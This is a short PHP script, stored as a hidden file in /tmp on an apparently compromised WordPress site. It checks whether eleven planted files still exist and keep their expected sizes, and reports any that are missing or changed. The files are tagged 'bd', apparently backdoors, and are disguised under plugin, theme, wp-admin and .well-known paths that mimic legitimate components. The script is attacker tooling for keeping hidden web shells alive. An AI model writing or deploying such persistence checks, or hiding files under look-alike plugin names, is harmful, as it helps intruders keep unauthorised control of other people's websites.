File: //tmp/.entity
<?php $r = '/home/duta4dlogin.com/public_html'; $x = ["/wp-admin/OT3RUrusIxJ.php"=>"bd@@5384@@45022",
"/wp-content/plugins/wordpress-seo/src/task-list/user-interface/tasks/complete.task.route.php"=>"bd@@17682@@948",
"/wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml.edit.cache.php"=>"bd@@17685@@997",
"/wp-content/plugins/wordpress-seo/src/integrations/admin/activation.time.integration.php"=>"bd@@17692@@1017",
"/well-known/pki-validation/e/a/d/requests/wia.php"=>"bd@@17697@@1020",
"/well-known/acme-challenge/b/a/a/upgrades/account_edit.php"=>"bd@@17705@@958",
"/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/advcache.php"=>"bd@@8252@@941",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Cli/Command/Output.php"=>"bd@@8025@@908",
"/wp-content/themes/oranges/inc/compatibility/learndash/class.astra.learndash.php"=>"bd@@8307@@1041",
"/wp-content/plugins/wordpress-seo/src/dashboard/infrastructure/integrations/site.kit.php"=>"bd@@8095@@928",
"/wp-content/plugins/wordpress-seo/src/dashboard/infrastructure/score-groups/score.group.link.collector.php"=>"bd@@8189@@925"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');